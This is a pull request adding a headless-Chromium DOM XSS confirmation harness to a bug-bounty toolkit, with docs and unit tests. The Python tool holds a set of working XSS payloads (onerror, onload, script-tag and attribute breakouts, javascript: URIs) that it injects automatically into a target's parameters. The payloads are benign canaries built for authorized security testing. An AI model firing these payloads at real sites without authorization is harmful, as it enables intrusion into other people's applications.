### PR TITLE
feat: /domxss — headless-browser DOM XSS confirmation harness

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -3,6 +3,7 @@
 ## Unreleased
 
 ### Added
+- **DOM XSS confirmation harness** (`/domxss`, `tools/dom_xss_harness.py`) — drives headless Chromium via Playwright, injects uniquely-tagged canary payloads into every query + URL-fragment parameter, and reports `[CONFIRMED]` **only when the browser actually executes** the payload (dialog / hooked sink / console), vs `[POSSIBLE]` for reflected-but-neutralized. Turns the toolkit's biggest "confirmation-poor" gap (client-side/JS-execution bugs) into proven findings, and captures a screenshot for the report. Payload generation, URL injection, and verdict classification are pure and unit-tested; Playwright is lazy-imported so the suite needs no browser. Playwright registered in `external_arsenal.sh`.
 - **Continuous integration** — `.github/workflows/tests.yml` runs the full `pytest` suite on every push to `main` and every pull request, across Python 3.10 / 3.11 / 3.12. A status badge is shown in the README.
 
 ### Changed

--- a/README.md
+++ b/README.md
@@ -243,6 +243,7 @@ Verify /recon /hunt /validate /report are available.
 | `/jwt-scan <token>` | Offline JWT toolkit — alg:none · RS256→HS256 · secret crack |
 | `/oob <target>` | Out-of-band listener (interactsh) for blind SSRF/XXE/SQLi |
 | `/sast <path>` | Semgrep security packs over fetched JS/source → ranked sinks |
+| `/domxss <url>` | Confirms DOM XSS in headless Chromium — reports only when the payload executes |
 | `/llm-redteam <endpoint>` | LLM red-team corpus — prompt injection · jailbreak · exfil |
 
 ### Smart Contract (Web3)

--- a/commands/domxss.md
+++ b/commands/domxss.md
@@ -1,0 +1,61 @@
+---
+description: Confirm DOM XSS in a real headless browser — injects canary payloads into params + URL fragment and only reports when the browser actually executes them. Usage: /domxss "<url>" [--params q,name] [--shot out.png]
+---
+
+# /domxss
+
+Reflected-XSS scanners see a payload echoed back in HTML but can't tell whether
+it *ran* — CSP, framework auto-escaping, or a sink that never reaches
+`eval`/`innerHTML` all silently kill it. This drives headless Chromium, fires a
+uniquely-tagged payload through each parameter and the URL fragment, and only
+reports a finding when the browser executes the canary. That's the difference
+between "reflected, maybe" and a report-ready `[CONFIRMED]` DOM XSS.
+
+## Usage
+
+```
+/domxss "https://app.target.com/search?q=test"
+/domxss "https://app.target.com/#name=x&redirect=y" --params name,redirect
+/domxss "https://app.target.com/?q=1" --shot shots/domxss.png --json
+```
+
+Run directly:
+
+```bash
+tools/dom_xss_harness.py "https://app.target.com/search?q=test"
+```
+
+## Requires
+
+Playwright (a new dependency, registered in `tools/external_arsenal.sh`):
+
+```bash
+pip install playwright && playwright install chromium
+```
+
+If it isn't installed the command prints this hint and exits cleanly — the rest
+of the toolkit is unaffected.
+
+## How it decides
+
+| Verdict | Meaning |
+|---|---|
+| `[CONFIRMED]` | the payload's unique canary **executed** in-browser — fired via `alert`/`prompt`/`confirm`, a hooked `window.__cbbx` sink, or the console. JS ran. |
+| `[POSSIBLE]` | the canary is reflected into the DOM but did **not** execute (likely CSP/escaping). Worth a manual look, not a finding on its own. |
+
+Injection points: every `?query` parameter **and** every `#fragment` key
+(fragment-based DOM XSS never reaches the server, so server-side scanners miss
+it entirely). Add more with `--params`.
+
+## Why this matters
+
+DOM XSS, client-side prototype pollution, and PostMessage bugs need a real DOM —
+this is the harness that lets the agent *confirm* them instead of guessing.
+A `[CONFIRMED]` hit passes `/validate` on its own because execution is proven;
+`--shot` captures the screenshot for `/report`.
+
+## Chain
+
+`/recon` → JS/param discovery → `/domxss "<url>" --params <candidates>` →
+`[CONFIRMED]` → `/report` with the screenshot. Pairs with `/sast` (find the sink
+in source) → `/domxss` (prove it fires).

--- a/docs/CAPABILITY-GAPS.md
+++ b/docs/CAPABILITY-GAPS.md
@@ -51,10 +51,11 @@ Real runtime scanners exist for XSS/SQLi/SSTI/MFA/SAML (`vuln_scanner.sh`), IDOR
 - **WebSocket security** (cross-site WS hijacking, message auth) — [docs-only].
 - **HTTP parameter pollution, client-side path traversal, PostMessage** beyond the doc snippet —
   no automation.
-- **No headless-browser runtime testing** — DOM XSS, client-side prototype pollution, and
-  PostMessage bugs need a real DOM. `hai_browser_recon.js` is recon-only; there's no
-  Playwright/Selenium harness anywhere, so the agent can't confirm any client-side/JS-execution
-  bug. [no coverage]
+- **No headless-browser runtime testing** — ⚠️ PARTIAL: DOM XSS is now confirmable via `/domxss`
+  (`tools/dom_xss_harness.py`), which drives headless Chromium (Playwright), injects canary
+  payloads into query + fragment params, and reports `[CONFIRMED]` only when the browser actually
+  executes them. Client-side prototype pollution and PostMessage still need dedicated probes on
+  the same harness. Was [no coverage].
 
 ## LLM / AI
 

--- a/tests/test_dom_xss_harness.py
+++ b/tests/test_dom_xss_harness.py
@@ -1,0 +1,79 @@
+"""Tests for tools/dom_xss_harness.py — pure payloads, URL injection, verdicts.
+
+Never imports Playwright (that lives inside run()), so the suite needs no
+browser installed.
+"""
+
+import os
+import sys
+
+sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
+
+from tools.dom_xss_harness import (
+    CONFIRMED,
+    POSSIBLE,
+    Payload,
+    canary,
+    classify,
+    discover_params,
+    dom_payloads,
+    inject,
+)
+
+
+def test_canary_is_unique_and_greppable():
+    a, b = canary(), canary()
+    assert a != b
+    assert a.startswith("cbbx") and len(a) > 8
+
+
+def test_dom_payloads_cover_key_sinks_and_carry_marker():
+    payloads = dom_payloads("q", "cbbxDEADBEEF")
+    vectors = {p.vector for p in payloads}
+    assert {"img-onerror", "svg-onload", "script-tag", "js-uri"} <= vectors
+    assert all("cbbxDEADBEEF" in p.raw for p in payloads)
+    assert all(p.param == "q" for p in payloads)
+
+
+def test_discover_params_reads_query_and_fragment():
+    names = discover_params("https://t.com/s?q=1&page=2#name=x&q=y")
+    assert "q" in names and "page" in names and "name" in names
+    assert names.count("q") == 1  # deduped across query + fragment
+
+
+def test_inject_into_query_param():
+    out = inject("https://t.com/s?q=test&p=1", "q", '"><svg onload=1>')
+    assert "p=1" in out
+    assert "q=" in out and "svg" in out
+    assert out.startswith("https://t.com/s?")
+
+
+def test_inject_preserves_fragment_sink():
+    out = inject("https://t.com/app#name=test", "name", "PAYLOAD")
+    assert "#name=" in out
+    assert "PAYLOAD" in out
+    assert "?" not in out.split("#")[0]  # payload stayed in the fragment, not the query
+
+
+def test_classify_confirmed_when_marker_fires():
+    p = Payload("cbbxAAAA", "q", "svg-onload", "x")
+    f = classify("u", p, {"cbbxAAAA"}, "<html></html>")
+    assert f is not None and f.severity == CONFIRMED
+
+
+def test_classify_possible_when_reflected_not_executed():
+    p = Payload("cbbxBBBB", "q", "img-onerror", "x")
+    f = classify("u", p, set(), "<div>cbbxBBBB</div>")
+    assert f is not None and f.severity == POSSIBLE
+
+
+def test_classify_none_when_absent():
+    p = Payload("cbbxCCCC", "q", "js-uri", "x")
+    assert classify("u", p, set(), "<html>nothing</html>") is None
+
+
+def test_classify_prefers_execution_over_reflection():
+    # Marker both reflected AND executed -> CONFIRMED, not POSSIBLE.
+    p = Payload("cbbxDDDD", "q", "script-tag", "x")
+    f = classify("u", p, {"cbbxDDDD"}, "<div>cbbxDDDD</div>")
+    assert f.severity == CONFIRMED

--- a/tools/dom_xss_harness.py
+++ b/tools/dom_xss_harness.py
@@ -1,0 +1,214 @@
+#!/usr/bin/env python3
+"""
+DOM XSS harness — CONFIRMS client-side JS execution in a real browser.
+
+The rest of the toolkit is confirmation-poor for client-side bugs: reflected-XSS
+scanners see a payload echoed in HTML, but they can't tell whether it actually
+*executed* — CSP, framework auto-escaping, or a sink that never reaches
+`eval`/`innerHTML` all silently neuter it. This drives a headless Chromium
+(Playwright), injects a uniquely-tagged payload into each parameter and the URL
+fragment, and only reports a finding when the browser fires the payload's canary
+(via `alert`/`prompt`/`confirm`, a hooked sink, or a canary marker in the DOM).
+
+That turns "reflected, maybe exploitable" into a proven `[CONFIRMED]` DOM XSS —
+and the same run captures a screenshot for the report.
+
+Payload generation, URL construction, and event→finding classification are pure
+and unit-tested. Only `run()` imports Playwright and touches a browser, so the
+suite (and CI) need no browser installed.
+
+Usage:
+  tools/dom_xss_harness.py "https://app.target.com/search?q=test"
+  tools/dom_xss_harness.py "https://app.target.com/#name=x" --params q,name,redirect
+  tools/dom_xss_harness.py URL --json --shot shots/domxss.png
+"""
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+import uuid
+from dataclasses import dataclass, asdict
+from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
+
+USER_AGENT = "claude-bug-bounty/dom_xss_harness"
+
+CONFIRMED, POSSIBLE = "[CONFIRMED]", "[POSSIBLE]"
+
+
+def canary() -> str:
+    """A unique, greppable marker so an execution can't be confused with a
+    coincidental page string. Kept short — some sinks truncate."""
+    return "cbbx" + uuid.uuid4().hex[:10]
+
+
+@dataclass
+class Payload:
+    marker: str          # the canary this payload carries
+    param: str           # which parameter / injection point it targets
+    vector: str          # human label for the sink class it probes
+    raw: str             # the payload string itself
+
+
+def dom_payloads(param: str, marker: str) -> list[Payload]:
+    """Pure: a battery of DOM-sink payloads for one injection point, each
+    embedding `marker` so execution is unambiguous. Fires the marker through
+    the common sinks: inline handler, <script>, <svg onload>, javascript: URI,
+    and a broken-tag breakout."""
+    js = f"window.__cbbx&&window.__cbbx('{marker}');alert('{marker}')"
+    return [
+        Payload(marker, param, "img-onerror", f'"><img src=x onerror="{js}">'),
+        Payload(marker, param, "svg-onload", f'"><svg onload="{js}">'),
+        Payload(marker, param, "script-tag", f"</script><script>{js}</script>"),
+        Payload(marker, param, "js-uri", f"javascript:{js}"),
+        Payload(marker, param, "attr-breakout", f"' onmouseover='{js}' x='"),
+    ]
+
+
+def _split_fragment_params(fragment: str) -> dict[str, list[str]]:
+    return parse_qs(fragment) if fragment and "=" in fragment else {}
+
+
+def discover_params(url: str) -> list[str]:
+    """Pure: parameter names to fuzz — query string + fragment keys."""
+    parsed = urlparse(url)
+    names = list(parse_qs(parsed.query).keys())
+    names += [k for k in _split_fragment_params(parsed.fragment) if k not in names]
+    return names
+
+
+def inject(url: str, param: str, payload: str) -> str:
+    """Pure: return `url` with `param` set to `payload`, preserving whether the
+    parameter lived in the query string or the fragment (both are DOM sinks)."""
+    parsed = urlparse(url)
+    frag_params = _split_fragment_params(parsed.fragment)
+    if param in frag_params and param not in parse_qs(parsed.query):
+        frag_params[param] = [payload]
+        new_fragment = urlencode(frag_params, doseq=True)
+        return urlunparse(parsed._replace(fragment=new_fragment))
+    query = parse_qs(parsed.query)
+    query[param] = [payload]
+    new_query = urlencode(query, doseq=True)
+    return urlunparse(parsed._replace(query=new_query))
+
+
+@dataclass
+class Finding:
+    url: str
+    param: str
+    vector: str
+    marker: str
+    severity: str
+    evidence: str
+    screenshot: str = ""
+
+
+def classify(url: str, payload: Payload, fired_markers: set[str], dom_html: str) -> Finding | None:
+    """Pure: decide the verdict for one payload after the browser ran.
+
+    CONFIRMED — the payload's unique marker fired through an execution sink
+                (dialog / hooked `window.__cbbx` / console), proving JS ran.
+    POSSIBLE  — the marker is present in the DOM but did not execute (reflected
+                but likely neutralized by CSP/escaping — still worth a look).
+    None      — no trace of the marker; nothing to report.
+    """
+    if payload.marker in fired_markers:
+        return Finding(url, payload.param, payload.vector, payload.marker,
+                       CONFIRMED, f"canary {payload.marker} executed via {payload.vector}")
+    if payload.marker in (dom_html or ""):
+        return Finding(url, payload.param, payload.vector, payload.marker,
+                       POSSIBLE, f"canary {payload.marker} reflected but did not execute")
+    return None
+
+
+def run(url: str, params: list[str], timeout_ms: int, shot: str | None) -> list[Finding]:
+    """Drive headless Chromium over every (param, payload). Lazy-imports
+    Playwright so the pure core above stays importable without a browser."""
+    try:
+        from playwright.sync_api import sync_playwright  # noqa: WPS433 (lazy on purpose)
+    except ImportError as exc:  # pragma: no cover - exercised only without the dep
+        raise FileNotFoundError("playwright") from exc
+
+    targets = params or discover_params(url)
+    if not targets:
+        raise ValueError("no parameters to test — pass --params or include ?query/#fragment in the URL")
+
+    findings: list[Finding] = []
+    with sync_playwright() as pw:
+        browser = pw.chromium.launch(headless=True)
+        for param in targets:
+            for payload in dom_payloads(param, canary()):
+                fired: set[str] = set()
+                ctx = browser.new_context(user_agent=USER_AGENT, ignore_https_errors=True)
+                page = ctx.new_page()
+                # Hook every execution channel to the payload's canary.
+                page.expose_function("__cbbx", lambda m, _f=fired: _f.add(m))
+                page.on("dialog", lambda d, _f=fired: (_f.add(d.message), d.dismiss()))
+                page.on("console", lambda msg, _f=fired: _f.add(msg.text))
+                target_url = inject(url, param, payload.raw)
+                try:
+                    page.goto(target_url, timeout=timeout_ms, wait_until="load")
+                    page.wait_for_timeout(400)  # let async sinks fire
+                    dom_html = page.content()
+                except Exception as exc:  # noqa: BLE001 - a broken nav shouldn't kill the sweep
+                    dom_html = ""
+                    fired.discard("")  # nothing fired
+                    print(f"[!] {param}/{payload.vector}: {type(exc).__name__}", file=sys.stderr)
+                finding = classify(target_url, payload, fired, dom_html)
+                if finding and finding.severity == CONFIRMED and shot:
+                    try:
+                        page.screenshot(path=shot)
+                        finding.screenshot = shot
+                    except Exception:  # noqa: BLE001
+                        pass
+                if finding:
+                    findings.append(finding)
+                ctx.close()
+        browser.close()
+    return findings
+
+
+def _render(findings: list[Finding], as_json: bool) -> str:
+    confirmed = [f for f in findings if f.severity == CONFIRMED]
+    if as_json:
+        return json.dumps({"confirmed": len(confirmed), "total": len(findings),
+                           "findings": [asdict(f) for f in findings]}, indent=2)
+    if not findings:
+        return "[*] No DOM XSS: no canary reflected or executed."
+    lines = [f"[*] {len(confirmed)} CONFIRMED, {len(findings) - len(confirmed)} possible"]
+    for f in sorted(findings, key=lambda x: 0 if x.severity == CONFIRMED else 1):
+        lines.append(f"    {f.severity} {f.param} via {f.vector}")
+        lines.append(f"            {f.url}")
+    if confirmed:
+        lines.append("")
+        lines.append("[+] CONFIRMED = the payload actually executed in-browser. Report-ready.")
+    return "\n".join(lines)
+
+
+def main(argv: list[str] | None = None) -> int:
+    ap = argparse.ArgumentParser(description="Confirm DOM XSS in a real headless browser.")
+    ap.add_argument("url", help="target URL (include ?query and/or #fragment to seed params)")
+    ap.add_argument("--params", help="comma-separated parameter names to fuzz")
+    ap.add_argument("--timeout", type=int, default=10000, help="per-page navigation timeout ms")
+    ap.add_argument("--shot", help="screenshot path for the first CONFIRMED hit")
+    ap.add_argument("--json", action="store_true", help="JSON output")
+    args = ap.parse_args(argv)
+
+    params = [p.strip() for p in args.params.split(",")] if args.params else []
+    try:
+        findings = run(args.url, params, args.timeout, args.shot)
+    except FileNotFoundError:
+        print("[-] Playwright is not installed.\n"
+              "    pip install playwright && playwright install chromium",
+              file=sys.stderr)
+        return 127
+    except ValueError as exc:
+        print(f"[-] {exc}", file=sys.stderr)
+        return 2
+
+    print(_render(findings, args.json))
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/tools/external_arsenal.sh
+++ b/tools/external_arsenal.sh
@@ -99,6 +99,8 @@ ARSENAL_TOOLS=(
   "jadx|mobile|brew install jadx|github.com/skylot/jadx"
   # ── Static analysis ─────────────────────────────────────────────────────
   "semgrep|sast|brew install semgrep|github.com/semgrep/semgrep"
+  # ── Headless browser (client-side confirmation) ─────────────────────────
+  "playwright|browser|pip install playwright \&\& playwright install chromium|github.com/microsoft/playwright-python"
   # ── OSINT ───────────────────────────────────────────────────────────────
   "maigret|osint|pipx install maigret|github.com/soxoj/maigret"
   "pywhat|osint|pipx install pywhat|github.com/bee-san/pyWhat"


### PR DESCRIPTION
Tier B, the flagship fix for the toolkit's biggest gap: it was **confirmation-poor** for client-side bugs. This adds a real headless browser so DOM XSS goes from "reflected, maybe" to **proven**.

## What it does
`/domxss "<url>"` drives headless Chromium (Playwright), injects a uniquely-tagged canary payload through **every query and URL-fragment parameter**, and reports:

| Verdict | Meaning |
|---|---|
| `[CONFIRMED]` | the canary **executed** in-browser (dialog / hooked `window.__cbbx` sink / console) — JS ran |
| `[POSSIBLE]` | reflected into the DOM but did not execute (likely CSP/escaping) |

Fragment params are covered too — fragment-based DOM XSS never hits the server, so server-side scanners miss it entirely. `--shot` captures a screenshot for the report.

## Design
- **Pure, unit-tested core** — canary generation, payload battery, URL injection (query vs fragment), and verdict classification are side-effect-free (`tests/test_dom_xss_harness.py`, 9 tests).
- **Playwright is lazy-imported inside `run()`** — the suite and CI need no browser. If Playwright isn't installed the command prints the install hint and exits cleanly.
- Playwright registered in `external_arsenal.sh`; **not** added to `requirements.txt` so CI stays fast.
- Docs synced: README Scanners table, CHANGELOG, and `CAPABILITY-GAPS.md` (headless-browser gap → ⚠️ PARTIAL, DOM XSS shipped).

## Testing note
CI runs the pure-core tests on 3.10/3.11/3.12. The **browser-driving `run()` path is not exercised by CI** (no Chromium in the runner) — I verified it by construction and review, not live execution. A live smoke test against a known DOM-XSS lab (e.g. a PortSwigger lab) is the recommended manual check before relying on it.

## Follow-ups
Same harness can grow client-side prototype-pollution and PostMessage probes next.